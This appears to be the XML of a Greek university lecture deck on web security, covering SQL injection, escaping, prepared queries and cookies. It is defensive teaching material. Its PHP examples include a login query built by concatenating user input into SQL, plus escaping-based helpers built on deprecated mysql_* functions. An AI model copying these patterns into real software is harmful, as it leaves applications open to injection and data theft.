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59"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="257" r:id="rId2"/>
    <p:sldId id="489" r:id="rId3"/>
    <p:sldId id="437" r:id="rId4"/>
    <p:sldId id="438" r:id="rId5"/>
    <p:sldId id="439" r:id="rId6"/>
    <p:sldId id="440" r:id="rId7"/>
    <p:sldId id="441" r:id="rId8"/>
    <p:sldId id="442" r:id="rId9"/>
    <p:sldId id="443" r:id="rId10"/>
    <p:sldId id="444" r:id="rId11"/>
    <p:sldId id="518" r:id="rId12"/>
    <p:sldId id="445" r:id="rId13"/>
    <p:sldId id="446" r:id="rId14"/>
    <p:sldId id="447" r:id="rId15"/>
    <p:sldId id="448" r:id="rId16"/>
    <p:sldId id="449" r:id="rId17"/>
    <p:sldId id="450" r:id="rId18"/>
    <p:sldId id="451" r:id="rId19"/>
    <p:sldId id="452" r:id="rId20"/>
    <p:sldId id="453" r:id="rId21"/>
    <p:sldId id="454" r:id="rId22"/>
    <p:sldId id="455" r:id="rId23"/>
    <p:sldId id="515" r:id="rId24"/>
    <p:sldId id="457" r:id="rId25"/>
    <p:sldId id="458" r:id="rId26"/>
    <p:sldId id="459" r:id="rId27"/>
    <p:sldId id="460" r:id="rId28"/>
    <p:sldId id="461" r:id="rId29"/>
    <p:sldId id="462" r:id="rId30"/>
    <p:sldId id="463" r:id="rId31"/>
    <p:sldId id="464" r:id="rId32"/>
    <p:sldId id="519" r:id="rId33"/>
    <p:sldId id="465" r:id="rId34"/>
    <p:sldId id="466" r:id="rId35"/>
    <p:sldId id="467" r:id="rId36"/>
    <p:sldId id="468" r:id="rId37"/>
    <p:sldId id="469" r:id="rId38"/>
    <p:sldId id="470" r:id="rId39"/>
    <p:sldId id="471" r:id="rId40"/>
    <p:sldId id="472" r:id="rId41"/>
    <p:sldId id="473" r:id="rId42"/>
    <p:sldId id="474" r:id="rId43"/>
    <p:sldId id="475" r:id="rId44"/>
    <p:sldId id="476" r:id="rId45"/>
    <p:sldId id="477" r:id="rId46"/>
    <p:sldId id="478" r:id="rId47"/>
    <p:sldId id="479" r:id="rId48"/>
    <p:sldId id="480" r:id="rId49"/>
    <p:sldId id="481" r:id="rId50"/>
    <p:sldId id="482" r:id="rId51"/>
    <p:sldId id="490" r:id="rId52"/>
    <p:sldId id="483" r:id="rId53"/>
    <p:sldId id="484" r:id="rId54"/>
    <p:sldId id="485" r:id="rId55"/>
    <p:sldId id="486" r:id="rId56"/>
    <p:sldId id="487" r:id="rId57"/>
    <p:sldId id="488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35" autoAdjust="0"/>
    <p:restoredTop sz="92058" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="98" d="100"/>
          <a:sy n="98" d="100"/>
        </p:scale>
        <p:origin x="1920" y="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551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A86B8-41A5-45BF-AE9B-96C920165E62}" type="datetimeFigureOut">
              <a:rPr lang="el-GR" smtClean="0"/>
              <a:t>31/5/16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C186E-BD72-4EC5-9A2E-D7B3A468EF5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26300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28580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20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02459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31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3060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Test on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>stackoverflow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32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92124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DVWA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46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61444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6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May 31,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May 31,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May 31,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May 31,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70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May 31,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May 31,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May 31,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4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May 31,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May 31,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8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May 31,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9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May 31,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May 31,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r.php.net/pdo" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://gr.php.net/mysqli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security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8137248" cy="2948136"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Άγγελος </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" err="1" smtClean="0"/>
              <a:t>Κιαγιάς</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Διονύσης </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" err="1" smtClean="0"/>
              <a:t>Ζήνδρος</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="el-GR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0"/>
              <a:t>Πληροφορική </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>ΕΚΠΑ 2016</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="el-GR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Επιμέλεια διαφανειών:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Θέμης </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" err="1" smtClean="0"/>
              <a:t>Παπαμελετίου</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>, Πέτρος </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" err="1" smtClean="0"/>
              <a:t>Αγγελάτος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61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l-GR" dirty="0" smtClean="0"/>
              <a:t>ο </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SQL injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>μπορεί να επιτρέψει:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Αντιγραφή όλων των δεδομένων μας χωρίς να το ξέρουμε</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Αλλαγή των δεδομένων μας</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Διαγραφή των δεδομένων μας</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Μπορεί να χρησιμοποιηθεί ως </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>πάτημα</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t> για πλήρη πρόσβαση</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>π.χ. για πρόσβαση σε </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>administrator </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>λογαριασμούς</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>ανάγνωση κωδικών πρόσβασης</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>κλπ.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2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3700"/>
            <a:ext cx="8229600" cy="990600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SQL Injection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68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Αποφυγή </a:t>
            </a:r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Αποφυγή όλων των χαρακτήρων </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>‘ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>και</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t> και \</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="el-GR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&lt;?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php</a:t>
            </a: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$username = $_POST[ ‘username’ ];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if (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strpos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$username, “’” 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) !== false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|| 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strpos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$username,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“\\” ) !== false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|| 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strpos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$username,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‘”’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)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!== false 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die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“You’re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not welcome here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.”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}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83621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Αποφυγή </a:t>
            </a:r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Τι γίνεται όμως αν θέλουμε να επιτρέψουμε τους χαρακτήρες ‘, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>και </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>\   ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Δεν γίνεται να απαγορεύουμε π.χ. την αναζήτηση με εισαγωγικά!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Πώς είναι εφικτό να περνάμε τους χαρακτήρες αυτούς </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>χωρίς ιδιαίτερη σημασία</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t> στην </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>MySQL?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Αποφυγή </a:t>
            </a:r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Escape</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t> όλων των χαρακτήρων</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>‘ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> \’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>“  \</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR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l-GR" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="el-GR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&lt;?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php</a:t>
            </a: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$username = $_POST[ ‘username’ ];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$username = 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addslashes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$username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06107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Αποφυγή </a:t>
            </a:r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 smtClean="0"/>
              <a:t>Αν...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$username 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είναι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dio’nyziz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userid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users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name =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dio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\’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nyziz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AND password =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ILoveYou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LIMIT 1;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779915" y="4335205"/>
            <a:ext cx="449429" cy="39139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67946" y="3961126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Μέρος το αλφαριθμητικού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68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Αποφυγή </a:t>
            </a:r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mysql_real_escape_string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()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Κάνει την ίδια δουλειά με την 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addslashes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()</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR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r>
              <a:rPr lang="el-GR" dirty="0"/>
              <a:t>Την προτιμούμε από την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addslashes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l-GR" dirty="0" smtClean="0"/>
              <a:t>καθώς </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0"/>
              <a:t>λαμβάνει υπ’ όψιν το </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>encoding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0"/>
              <a:t>της βάσης δεδομένων</a:t>
            </a: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03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ploits of a M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8" y="1772816"/>
            <a:ext cx="8889651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38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Ποιο είναι το βαθύτερο πρόβλημα;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Τα </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>δεδομένα</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t> και οι </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>εντολές </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>αναπαρίστανται σε ένα </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>κοινό </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>αλφαριθμητικό</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Δεν υπάρχει διαχωρισμός </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>εντολών</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t> και </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>δεδομένων</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t> σε επίπεδο </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>Όλα είναι ένα μεγάλο </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>string!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Έτσι </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>τα δεδομένα </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>μπορούν να καταλήξουν </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>να είναι εντολές</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Πρόβλημα ασφαλείας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060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67746" y="1268760"/>
            <a:ext cx="525658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$res = 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mysql_query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“SELECT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userid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users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password = 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‘”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solidFill>
                  <a:srgbClr val="678930"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>. $password .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”’ AND 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name = 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‘”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678930"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>. $user .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”’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LIMIT 1;”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</a:rPr>
              <a:t>);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754356" y="3933785"/>
            <a:ext cx="473829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064240" y="4640925"/>
            <a:ext cx="116394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98052" y="4490496"/>
            <a:ext cx="202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Δεδομένα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6932" y="2489710"/>
            <a:ext cx="136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Εντολές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680016" y="2674376"/>
            <a:ext cx="96619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>
            <a:off x="2195737" y="1700812"/>
            <a:ext cx="288032" cy="3754871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090" y="3393580"/>
            <a:ext cx="375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>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Αλφαριθμητικό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44210" y="3749119"/>
            <a:ext cx="202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Δεδομένα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23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 animBg="1"/>
      <p:bldP spid="14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Βασική αρχή ασφαλείας του </a:t>
            </a:r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Το </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>χρησιμοποιεί ένα μοντέλο «αμμοδοχείου»</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Ο </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0"/>
              <a:t>χρήστης μπορεί να μπει σε σελίδες </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0"/>
              <a:t>ελεύθερα χωρίς να φοβάται</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Καμία σελίδα δεν μπορεί να </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>βλάψει</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t> τον υπολογιστή μας</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Μία επίσκεψη δεν αρκεί για να κάνει κακό σ’ εμάς</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Το χειρότερο που συμβαίνει είναι να μας κάνουν </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>RickRoll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>!</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Εκτός αν το επιτρέψουμε εμείς κατεβάζοντας κάποιο </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>πρόγραμμα</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Εκεί διαφέρουν οι </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>εφαρμογές από τις </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>desktop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Το </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>μοντέλο είναι ένα ασφαλέστερο μοντέλο</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Δεν απαιτείται εμπιστοσύνη για να «τρέξουμε» μία </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>εφαρμογή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55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Πώς διαχωρίζουμε εντολές/δεδομένα;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Δεν θα ήταν ωραίο να είχαμε...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="el-GR" dirty="0"/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$res =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prepared_query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“SELECT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userid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users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password = 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AND name = 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LIMIT 1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;”</a:t>
            </a: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</a:rPr>
              <a:t>,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678930"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>array( $password</a:t>
            </a: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</a:rPr>
              <a:t>,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</a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="678930"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>user )</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400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274320" lvl="1" indent="0">
              <a:buNone/>
            </a:pP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5817" y="3619082"/>
            <a:ext cx="136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Εντολές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878902" y="3803748"/>
            <a:ext cx="96619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52552" y="4384214"/>
            <a:ext cx="136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Δεδομένα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34024" y="4835792"/>
            <a:ext cx="410184" cy="7205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22371" y="4857507"/>
            <a:ext cx="730511" cy="8234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30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28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&lt;?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php</a:t>
            </a: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function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prepared_query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 $code, $data ) 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$parts = explode( ‘?’, $code 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$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sql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= ‘’;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foreach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( $data as $value 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sql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.=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array_shift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 $parts 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$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sql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.= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="678930"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>‘”’ .addslashes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($value). ‘”’;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$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sql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.=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array_shift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 $parts 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return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mysql_query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 $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sql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or die(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mysql_error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() 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8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«Προετοιμασμένα» ερωτήματα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Ερωτήματα όπου ξεχωρίζουν τα δεδομένα από τις εντολές</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Η </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t> προσφέρει και κάποιες έτοιμες λύσεις</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Βιβλιοθήκη </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>PDO </a:t>
            </a:r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://php.net/pdo</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Βιβλιοθήκη </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>MySQLi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r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://php.net/mysqli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933700"/>
            <a:ext cx="8229600" cy="990600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Client-Side Vulnerabilities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7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Δεδομένα που στέλνει ο </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0"/>
              <a:t>στον </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>browser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0"/>
              <a:t>μαζί με την απάντηση σε κάποιο </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP(s) request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0"/>
              <a:t>Είναι σε μορφή </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”name=value”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0"/>
              <a:t>Ο </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>browser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0"/>
              <a:t>τα:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0"/>
              <a:t>αποθηκεύει ανα </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>domain</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0"/>
              <a:t>στέλνει πίσω στον </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0"/>
              <a:t>με κάθε νέο </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>request</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0"/>
              <a:t>Μόνο το ίδιο το </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0"/>
              <a:t> έχει πρόσβαση στα </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>cookies </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0"/>
              <a:t>του</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0"/>
              <a:t>Διατηρούνται μέχρι:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0"/>
              <a:t> να κλείσει ο </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>browser</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0"/>
              <a:t> να φτάσει το</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> expiration date </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0"/>
              <a:t>τους </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="135743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Χρήσεις </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cookies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Για να θυμάται ο </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>browser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0"/>
              <a:t>αν έχει επισκεφθεί ξανά κάποιο </a:t>
            </a:r>
            <a:r>
